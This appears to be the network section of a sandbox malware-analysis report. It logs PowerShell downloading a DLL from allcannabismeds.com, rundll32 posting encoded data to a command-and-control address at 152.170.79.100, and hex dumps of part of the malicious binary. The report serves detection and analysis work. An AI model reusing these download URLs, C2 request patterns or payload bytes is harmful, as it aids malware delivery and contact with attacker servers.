Jan 13, 2021 16:31:49.967792034 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.967813969 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.967833042 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.967837095 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.967854977 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.967875004 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.967890024 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.967895031 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.967911005 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.967916012 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.967942953 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.967957020 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.967966080 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.967988014 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968008041 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.968008995 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968033075 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968053102 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968054056 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.968074083 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968092918 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.968096018 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968122005 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968139887 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.968146086 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968167067 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968188047 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.968189001 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968210936 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968230009 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.968230963 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968254089 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968271971 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.968272924 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968301058 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968313932 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.968323946 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968344927 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968365908 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968369007 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.968388081 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968403101 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.968420982 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968445063 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.968513966 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968537092 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968559027 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968566895 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.968580961 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968599081 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.968633890 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968655109 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968677998 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.968709946 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968732119 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968755007 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.968787909 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968837023 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968849897 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.968858957 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968907118 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.968914986 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968938112 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968959093 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.968976974 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.970567942 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:50.109287977 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:50.109322071 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:50.109335899 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:50.109352112 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:50.109368086 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:50.109409094 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:50.109427929 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:50.109443903 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:50.109452963 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:50.109461069 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:50.109527111 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:50.109718084 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:50.109735966 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:50.109751940 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:50.109767914 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:50.109787941 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:50.109807014 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:50.109817982 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:50.109824896 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:50.109843016 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:50.109847069 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:50.109860897 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:50.109877110 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:50.109882116 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:50.109894037 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:50.109909058 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:50.109911919 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:50.109962940 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:50.110534906 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:50.671740055 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:32:08.898708105 CET	49168	80	192.168.2.22	152.170.79.100
Jan 13, 2021 16:32:09.206202030 CET	80	49168	152.170.79.100	192.168.2.22
Jan 13, 2021 16:32:09.206397057 CET	49168	80	192.168.2.22	152.170.79.100
Jan 13, 2021 16:32:09.207375050 CET	49168	80	192.168.2.22	152.170.79.100
Jan 13, 2021 16:32:09.207463026 CET	49168	80	192.168.2.22	152.170.79.100
Jan 13, 2021 16:32:09.517988920 CET	80	49168	152.170.79.100	192.168.2.22
Jan 13, 2021 16:32:09.518191099 CET	49168	80	192.168.2.22	152.170.79.100
Jan 13, 2021 16:32:09.832963943 CET	80	49168	152.170.79.100	192.168.2.22
Jan 13, 2021 16:32:10.037905931 CET	80	49168	152.170.79.100	192.168.2.22
Jan 13, 2021 16:32:10.358117104 CET	80	49168	152.170.79.100	192.168.2.22
Jan 13, 2021 16:32:10.358134985 CET	80	49168	152.170.79.100	192.168.2.22
Jan 13, 2021 16:32:10.358277082 CET	49168	80	192.168.2.22	152.170.79.100
Jan 13, 2021 16:32:10.666205883 CET	80	49168	152.170.79.100	192.168.2.22
Jan 13, 2021 16:32:10.666230917 CET	80	49168	152.170.79.100	192.168.2.22
Jan 13, 2021 16:32:10.666371107 CET	49168	80	192.168.2.22	152.170.79.100
Jan 13, 2021 16:33:15.357959032 CET	80	49168	152.170.79.100	192.168.2.22
Jan 13, 2021 16:33:15.358048916 CET	49168	80	192.168.2.22	152.170.79.100

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2021 16:31:48.641870975 CET	52197	53	192.168.2.22	8.8.8.8
Jan 13, 2021 16:31:48.805665016 CET	53	52197	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 13, 2021 16:31:48.641870975 CET	192.168.2.22	8.8.8.8	0xd372	Standard query (0)	allcannabismeds.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 13, 2021 16:31:48.805665016 CET	8.8.8.8	192.168.2.22	0xd372	No error (0)	allcannabismeds.com		35.208.69.64	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

allcannabismeds.com

152.170.79.100

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	35.208.69.64	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 16:31:48.980995893 CET	0	OUT	GET /unraid-map/ZZm6/ HTTP/1.1 Host: allcannabismeds.com Connection: Keep-Alive
Jan 13, 2021 16:31:49.179512978 CET	1	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 13 Jan 2021 15:31:49 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: keep-alive Cache-Control: no-cache, must-revalidate Pragma: no-cache Expires: Wed, 13 Jan 2021 15:31:49 GMT Content-Disposition: attachment; filename="NK05DJ2yiA.dll" Content-Transfer-Encoding: binary Set-Cookie: 5fff12651be7e=1610551909; expires=Wed, 13-Jan-2021 15:32:49 GMT; Max-Age=60; path=/ Last-Modified: Wed, 13 Jan 2021 15:31:49 GMT X-Httpd: 1 Host-Header: 6b7412fb82ca5edfd0917e3957f05d89 X-Proxy-Cache: MISS X-Proxy-Cache-Info: W NC:000000 UP:SKIP_CACHE_NO_CACHE Data Raw: 66 63 61 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f1 f3 83 42 b5 92 ed 11 b5 92 ed 11 b5 92 ed 11 a1 f9 ee 10 be 92 ed 11 a1 f9 e8 10 3d 92 ed 11 a1 f9 e9 10 a7 92 ed 11 4d e2 e9 10 ba 92 ed 11 4d e2 ee 10 a4 92 ed 11 4d e2 e8 10 94 92 ed 11 a1 f9 ec 10 b2 92 ed 11 b5 92 ec 11 39 92 ed 11 02 e3 e8 10 b6 92 ed 11 02 e3 ed 10 b4 92 ed 11 02 e3 12 11 b4 92 ed 11 b5 92 7a 11 b4 92 ed 11 02 e3 ef 10 b4 92 ed 11 52 69 63 68 b5 92 ed 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 16 00 ed 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1b 00 10 04 00 00 9e 02 00 00 00 00 00 81 3c 00 00 00 10 00 00 00 20 04 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 06 00 00 04 00 00 00 00 00 00 02 00 00 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 b7 04 00 50 00 00 00 b0 b7 04 00 50 00 00 00 00 f0 04 00 c0 b3 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 06 00 94 25 00 00 3c a2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 a2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 04 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 63 0f 04 00 00 10 00 00 00 10 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e0 a3 00 00 00 20 04 00 00 a4 00 00 00 14 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 dc 1e 00 00 00 d0 04 00 00 0c 00 00 00 b8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c0 b3 01 00 00 f0 04 00 00 b4 01 00 00 c4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 25 00 00 00 b0 06 Data Ascii: fca0MZ@!L!This program cannot be run in DOS mode.$B=MMM9zRichPEL_!< `PP%<T@ <.textc `.rdata @@.data@.rsrc@@.reloc%
Jan 13, 2021 16:31:49.179543972 CET	3	IN	Data Raw: 00 00 26 00 00 00 78 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: &x@B
Jan 13, 2021 16:31:49.179555893 CET	4	IN	Data Raw: 21 04 10 81 ff ca 00 00 00 75 18 a1 cc db 04 10 85 c0 74 ba 50 ff 15 34 20 04 10 89 35 cc db 04 10 eb ab 8d 45 ec 50 53 ff 15 d4 21 04 10 8d 45 ec 50 ff 15 3c 20 04 10 a3 cc db 04 10 eb 0c c6 00 00 eb 07 53 ff 15 0c 22 04 10 8b 4d fc 33 c0 5f 5e Data Ascii: !utP4 5EPS!EP< S"M3_^3[#UQQVu"jP4"3VhP"t@hVVu!8fEEEEEP58Q43^Uu"jP4"jhP"
Jan 13, 2021 16:31:49.179570913 CET	5	IN	Data Raw: 10 83 bd 6c ff ff ff 00 8b f0 74 7e 56 ff 15 20 20 04 10 ff b5 74 ff ff ff 89 45 80 56 ff 15 1c 20 04 10 56 ff 15 18 20 04 10 68 80 00 80 00 6a 01 6a 00 ff 15 44 20 04 10 50 56 89 45 88 ff 15 14 20 04 10 8b 4d f0 3b 4d f8 7d 27 8b d9 6a 00 53 6a Data Ascii: lt~V tEV V hjjD PVE M;M}'jSjV SuV, ;]\|huV$ ut\|pV hjjD PVh }\|;}}%jjWV uWV, ;}\|\|
Jan 13, 2021 16:31:49.179588079 CET	7	IN	Data Raw: 88 3f 88 47 01 5f 5b c9 c3 55 8b ec 8b 4d 0c 8b 55 08 53 8a 01 8a 1a 88 02 88 19 5b 5d c3 83 79 04 00 b8 bc 22 04 10 0f 45 41 04 c3 55 8b ec 83 ec 24 a1 54 d0 04 10 33 c5 89 45 fc 53 56 8b 35 f8 20 04 10 57 68 00 23 04 10 ff d6 85 c0 0f 84 c1 02 Data Ascii: ?G_[UMUS[]y"EAU$T3ESV5 Wh#3Eh#]]EUE#VPV5 PWh,#WX\EPh@#YPEPhX5"SSSSSSSSSSSSSSSSS
Jan 13, 2021 16:31:49.179605007 CET	8	IN	Data Raw: 00 75 11 8b 48 2c 85 c9 74 0a 83 78 18 00 74 04 ff d1 eb 03 83 c8 ff 5d c2 04 00 55 8b ec 8b 45 08 3b 45 0c 73 0c 6a 0d ff 15 f4 20 04 10 33 c0 eb 03 33 c0 40 5d c2 08 00 55 8b ec 51 51 83 65 f8 00 8b d1 53 8b 5d 14 56 57 33 f6 89 55 fc 8b 03 8b Data Ascii: uH,txt]UE;Esj 33@]UQQeS]VW3UKMx$f;pu8Ep8~~jhVP!EVjPGGGGPubt]EjhwP!tCwG7EuPVwU
Jan 13, 2021 16:31:49.179620981 CET	10	IN	Data Raw: 08 02 00 00 8b 5f 3c 03 df 81 3b 50 45 00 00 0f 85 ec 01 00 00 b8 4c 01 00 00 66 39 43 04 0f 85 dd 01 00 00 f6 43 38 01 0f 85 d3 01 00 00 0f b7 43 14 0f b7 7b 06 83 c0 24 85 ff 74 25 8b 4d fc 8d 14 18 83 7a 04 00 8b 43 38 0f 45 42 04 03 02 8d 52 Data Ascii: _<;PELf9CC8C{$t%MzC8EBR(;FuMEPxMEHQy{P##;vjh0Ws4!Eujh0WP!EujFj4j P MuhPQ OC
Jan 13, 2021 16:31:49.179637909 CET	11	IN	Data Raw: 61 08 00 c7 41 04 88 23 04 10 c7 01 d4 22 04 10 c3 55 8b ec 56 ff 75 08 8b f1 e8 97 e3 ff ff c7 06 9c 23 04 10 8b c6 5e 5d c2 04 00 83 61 04 00 8b c1 83 61 08 00 c7 01 9c 23 04 10 c3 55 8b ec 51 51 8b 45 08 56 8b f1 89 45 f8 8d 45 f8 c6 45 fc 01 Data Ascii: aA#"UVu#^]aa#UQQEVEEEV""bRPYY^UE"aaA]"aaUVu#^]UQVuup#^UVu#^]
Jan 13, 2021 16:31:49.179653883 CET	12	IN	Data Raw: 68 50 ae 04 10 8d 45 f4 50 e8 b0 18 00 00 cc 55 8b ec 83 ec 0c 8d 4d f4 ff 75 08 e8 61 fb ff ff 68 28 ad 04 10 8d 45 f4 50 e8 90 18 00 00 cc 55 8b ec 83 ec 0c 8d 4d f4 ff 75 08 e8 7b fb ff ff 68 80 ad 04 10 8d 45 f4 50 e8 70 18 00 00 cc 55 8b ec Data Ascii: hPEPUMuah(EPUMu{hEPpUMuhEPPUMuhEP0UMuhEPUMu5h4EP#UuYtuYt
Jan 13, 2021 16:31:49.179702997 CET	14	IN	Data Raw: f0 ff 75 fc c7 45 fc ff ff ff ff 8d 45 f4 64 a3 00 00 00 00 f2 c3 50 64 ff 35 00 00 00 00 8d 44 24 0c 2b 64 24 0c 53 56 57 89 28 8b e8 a1 54 d0 04 10 33 c5 50 89 65 f0 ff 75 fc c7 45 fc ff ff ff ff 8d 45 f4 64 a3 00 00 00 00 f2 c3 50 64 ff 35 00 Data Ascii: uEEdPd5D$+d$SVW(T3PeuEEdPd5D$+d$SVW(T3PEeuEEdL)UEVL)tjV#YY^]UEt3t tt3@0uuY}
Jan 13, 2021 16:31:49.334414959 CET	15	IN	Data Raw: 10 83 cf 01 89 3d 70 dc 04 10 eb 06 8b 3d 70 dc 04 10 8b 4d e4 6a 07 58 89 4d fc 39 45 f4 7c 2f 33 c9 53 0f a2 8b f3 5b 8d 5d dc 89 03 89 73 04 89 4b 08 8b 4d fc 89 53 0c 8b 5d e0 f7 c3 00 02 00 00 74 0e 83 cf 02 89 3d 70 dc 04 10 eb 03 8b 5d f0 Data Ascii: =p=pMjXM9E\|/3S[]sKMS]t=p]\l\l\tytq3EUEMj^#;uW\l\ t; l\#;uE

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49168	152.170.79.100	80	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 16:32:09.207375050 CET	450	OUT	POST /tkvop2zz2se/0vkwo/ HTTP/1.1 DNT: 0 Referer: 152.170.79.100/tkvop2zz2se/0vkwo/ Content-Type: multipart/form-data; boundary=---------------cRAzC1LzwrnqrIh User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 152.170.79.100 Content-Length: 5588 Connection: Keep-Alive Cache-Control: no-cache
Jan 13, 2021 16:32:09.207463026 CET	452	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 63 52 41 7a 43 31 4c 7a 77 72 6e 71 72 49 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 74 52 76 42 22 3b 20 Data Ascii: -----------------cRAzC1LzwrnqrIhContent-Disposition: form-data; name="mtRvB"; filename="nVFwboAAQOFEULOx"Content-Type: application/octet-streamQU8\@96TX3S(1JTbC!U~Hv8w0\BKEY3_qUs:v~.
Jan 13, 2021 16:32:09.518191099 CET	456	OUT	Data Raw: 67 49 10 61 5a d4 e6 1c 51 f7 8b 74 eb e0 5a 02 56 38 1b 4f 07 d0 e4 4e 86 a4 10 fd 80 c0 87 be 2a 8b 6d 38 53 31 56 30 5c ee dd 40 ee cd bc 1b 62 1a d3 78 6f 9d 7d cf e9 43 6e 11 cf fd 94 80 9c c5 22 89 b7 f9 7d fb e8 07 8c 4e c5 86 c0 86 04 af Data Ascii: gIaZQtZV8ONm8S1V0\@bxo}Cn"}N=C,=tOKt7bWr^XNV}dWLiRL(hN;J11/B"1u<.\|nzdDjms{:l1bCC44'0Gus, JF
Jan 13, 2021 16:32:10.358117104 CET	457	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 13 Jan 2021 15:32:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 62 33 34 0d 0a 90 ae 2f 6d ab 65 29 ef 32 0f fb be 51 ed 2a eb 75 6e 78 a1 65 ed 94 ed c7 3f ee aa 6f d6 5c f0 c9 cd 84 22 8a 1a ae ab 14 cb cd 0d c7 17 5f a9 19 14 6c a7 66 87 1b 42 df 01 c8 3a 16 fd b3 68 b4 80 95 4b b3 6d 17 59 03 7f 96 aa e3 7f 87 d9 d9 6d 3e 51 a0 c1 3c 32 1c 69 80 0d 7c 4d c1 3d 35 6c d5 de dd df c6 54 00 c7 18 a7 c1 df 61 9d 8c e6 ab ea 17 e4 db 60 db 00 9f 90 e6 da b2 9a 50 1d 5d ce 58 e5 f3 74 3b 24 09 41 ab 0f d0 bf 19 d4 32 f2 eb da 24 9b 90 5c 7f 93 75 88 e1 bc 99 e9 db a4 d3 bc 62 53 cc 01 7a b0 46 e9 4d 35 4f 78 d6 db 55 06 f2 f4 c5 20 40 44 d5 76 18 b5 ef 94 77 3d cd 8d 5d 19 fd a3 09 d7 b4 79 9b d1 57 ed ed 48 ed bd 39 b8 ab 4a 17 a2 2d e6 70 29 49 a4 9a 34 92 2b b8 ac 91 cb 23 02 c0 82 dd 87 a5 65 0e 17 f8 8e 7c d6 1e 4d 09 34 70 ef 88 7c 68 a3 71 11 70 a2 c1 d3 ba 9f 77 f8 4f 95 35 7a 76 93 fd 4b d4 0c b8 64 46 f4 5b 5c 7b 25 cb 90 2a 9b 3a 0f 4c 91 6f 98 7b ee eb e8 b8 e3 1f 2a d2 b5 69 03 51 db 2f ea 63 e1 73 1f fd 82 96 1d 28 76 97 32 cf a7 f2 54 60 f5 e4 4d b7 5f e2 05 60 03 ee 5e e6 3f f1 24 35 a0 14 32 70 79 29 04 5d 14 94 bc 37 1b af 9b 23 35 d8 f4 5a eb 78 a5 96 55 70 1c 5a 27 ce 05 49 7b 72 e3 30 84 5a 3c 48 a6 23 a1 0d f2 5b fe f9 08 37 8f 27 92 63 17 81 6a 04 2c 11 1d de a7 0a 3d 14 8e f6 7b 9c a6 dd fd 84 8f 34 7c 27 cd 2c 69 b2 4c ce 51 44 05 bc 4f 52 b5 98 73 43 c9 c7 db 66 6b 98 4e 1d 00 b7 f4 41 16 db ee 3e 83 2e a5 dd fd eb c6 76 8d cc 66 64 aa b3 e6 47 45 87 b6 a1 99 b0 48 32 d0 c3 18 72 2b 7f 6e 4e 3d 28 73 41 bc cb 9f 23 44 64 d0 a1 ef c9 be 16 28 c1 ee 88 8c 9a a7 5f 43 e3 02 f6 dc 19 c8 57 32 f1 5d 66 16 13 91 88 4e b4 8a b5 22 61 e8 cd a3 c8 41 12 f5 10 ca 13 75 33 da 02 94 8a cc c4 8f f0 b7 31 d6 ec 31 83 e5 26 bc ab b5 05 54 a0 a9 4b 58 6e 67 e3 1e 1e f6 fa 7b ab 21 9b 27 13 fe f4 25 b6 40 3d 7b a5 83 b7 e5 0e 59 62 06 a5 72 2e bb 2c 19 42 1a b6 cb b8 6a 87 14 b4 02 14 4e a5 fe b8 c7 6c fe a3 a5 95 29 3b 20 82 e3 50 ac f0 77 fb 8c 6c c2 6b e7 fd ce f1 80 b0 b6 eb 9d d6 a4 ee 77 3a 56 55 97 fe 0a 59 06 68 f0 70 8b 5c 79 21 95 d8 fc 76 05 e7 07 6f cb 7b 24 ff 05 b0 48 a6 7e 0d 7d 0b ec 10 fb 5e 33 3c 22 da 4b 36 99 fe b4 bd 69 a5 e2 fc c2 bb dc 4a d9 e9 54 42 a9 7b 27 82 6f fa d4 50 44 67 bb d3 8b 02 6f 8b 48 d7 d4 dd 60 ba 76 8a 99 83 dc 9b 7c 6e 86 15 cc f9 fe 86 18 3d 98 5a 81 b4 60 77 d8 f3 39 e2 5b 3f 6c da ee 76 55 2d fb 12 f9 46 4b 9e af b9 db 60 57 55 97 46 5d a1 24 74 8f 51 b4 54 c9 67 76 be af 16 53 4f 0b 7b 24 f6 d4 9d ee 75 93 0d c0 02 ee 40 c2 46 ae 20 f4 ff 48 99 d2 58 16 29 12 63 85 74 1b 17 52 5a af 9c 9e 7c 8a c4 42 da da 09 4f 14 28 2e e0 6e 3e 47 60 18 28 24 d6 c1 46 2c b4 26 2b cc 80 c6 b5 48 c9 2c 5f 86 64 fe 78 ad ee 1c 2d 08 ce 2d cd e5 de 85 02 1f 6b 42 4a 1f 05 cd a2 c4 43 3e 18 ff a2 80 91 46 1c 4d 18 68 4e 16 08 d2 2d 12 04 65 7a 75 11 d3 f4 52 2a 41 e5 e8 06 7c 36 59 bf e2 67 40 29 c4 df ab f3 78 10 73 ec 32 d2 5c a9 6c 8b 15 82 2b c2 a3 25 11 f3 49 e4 9d 35 56 38 13 60 6d 98 88 83 15 bf 12 c6 bd 0d dc 7e c5 e8 fc 10 bf 36 5b 5f b9 8e e2 41 3c af 35 4f c5 39 5e 14 a5 7e f1 9e 61 48 93 ec d1 dd 68 bf d9 9f 19 a7 08 44 45 90 fb 99 2e bb 19 82 a2 f6 ab db 47 c2 c3 e1 7b 4e b8 e1 b9 21 03 26 69 56 4e f9 8d 3e 39 27 23 4a 06 87 94 d1 94 7e ef d7 41 9c 25 b4 d0 76 d7 a7 a8 68 6b bc 9b 05 3d 58 6b c2 7b 54 2b 83 58 ae ff b1 e7 bb e1 bc 37 3c a2 b4 55 82 75 2e 4a 62 56 1c f2 ee cd 90 e8 a9 11 3b 0d 5b 6d 8b 06 e9 97 d4 43 aa 00 9d 26 33 cf 19 32 82 dd 42 21 83 02 aa a5 12 3d cf 55 29 1b c9 d4 f5 2d db 8c 3b 4f c8 dc Data Ascii: b34/me)2Qunxe?o\"_lfB:hKmYm>Q<2i\|M=5lTa`P]Xt;$A2$\ubSzFM5OxU @Dvw=]yWH9J-p)I4+#e\|M4p\|hqpwO5zvKdF[\{%:Lo{iQ/cs(v2T`M_`^?$52py)]7#5ZxUpZ'I{r0Z<H#[7'cj,={4\|',iLQDORsCfkNA>.vfdGEH2r+nN=(sA#Dd(_CW2]fN"aAu311&TKXng{!'%@={Ybr.,BjNl); Pwlkw:VUYhp\y!vo{$H~}^3<"K6iJTB{'oPDgoH`v\|n=Z`w9[?lvU-FK`WUF]$tQTgvSO{$u@F 